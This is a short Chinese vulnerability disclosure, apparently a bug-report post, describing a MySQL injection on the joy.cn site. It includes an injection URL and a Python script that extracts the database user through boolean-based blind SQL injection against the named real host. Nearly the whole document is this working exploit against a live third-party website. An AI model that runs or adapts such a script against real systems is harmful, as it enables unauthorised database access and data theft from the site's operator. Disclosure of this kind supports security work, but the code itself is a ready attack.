激动网主站MySQL注射(附验证脚本)

www.joy.cn/special-page.jsp?zt=6' and length(user())=21 and '1'='1

wapcms

#encoding=utf-8
 import httplib
 import time
 import string
 import sys
 import random
 import urllib
 
 
 headers = {}
 payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
 
 print 'Start to retrive MySQL User:'
 user = ''
 for i in range(1,30,1):
     for payload in payloads:
         conn = httplib.HTTPConnection('www.joy.cn', timeout=6)
         s = "6' and ascii(mid(user()from(%s)for(1)))=%s and '1'='1" % (i, ord(payload))
         conn.request(method='GET',
                      url = "/special-page.jsp?zt=" + urllib.quote(s),
                      headers=headers)
         start_time = time.time()
         html_doc = conn.getresponse().read().decode('utf-8')
         conn.close()
         if html_doc.find(u'东方爱民岗') > 0:
             user += payload
             print '/n[Scan in progress]' + user
             break
         else:
             print '.',
 
 print '/n[Done]MySQL user is ' + user